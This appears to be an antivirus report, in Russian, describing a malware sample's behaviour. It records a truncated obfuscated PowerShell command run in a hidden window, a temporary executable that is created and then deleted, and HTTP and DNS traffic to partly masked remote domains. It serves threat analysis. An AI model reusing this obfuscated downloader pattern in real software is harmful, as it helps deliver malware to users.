Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [StrinG]::jOIN( '', ((35 ,93 , 99 ,75,58, 105 , 98 , 112, 42,104 , 101,109,98,100 ,115 ,39, 73,98, 115 , 41 ,80 ,98,101,68 , 107,110 ,98,105,115 , 60 , 35 , 74 , 67, 70, 58, 32 , 111,115 , 115,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\43.exe
Удаляет следующие файлы
- %TEMP%\43.exe
Сетевая активность
Подключается к
- 'is###dhouse.cn':80
- 'la###rprise.net':80
- 'pr###rplano.org':80
TCP
Запросы HTTP GET
- http://www.is###dhouse.cn/28mMVV/
- http://www.la###rprise.net/VaBnGGME/
- http://pr###rplano.org/GDJux/
UDP
- DNS ASK is###dhouse.cn
- DNS ASK la###rprise.net
- DNS ASK do####hientrieu.com
- DNS ASK ph####aanthao.com
- DNS ASK pr###rplano.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [StrinG]::jOIN( '', ((35 ,93 , 99 ,75,58, 105 , 98 , 112, 42,104 , 101,109,98,100 ,115 ,39, 73,98, 115 , 41 ,80 ,98,101,68 , 107,110 ,98,105,115 , 60 , 35 , 74 , 67, 70, 58, 32 , 111,115 , 115,...' (со скрытым окном)
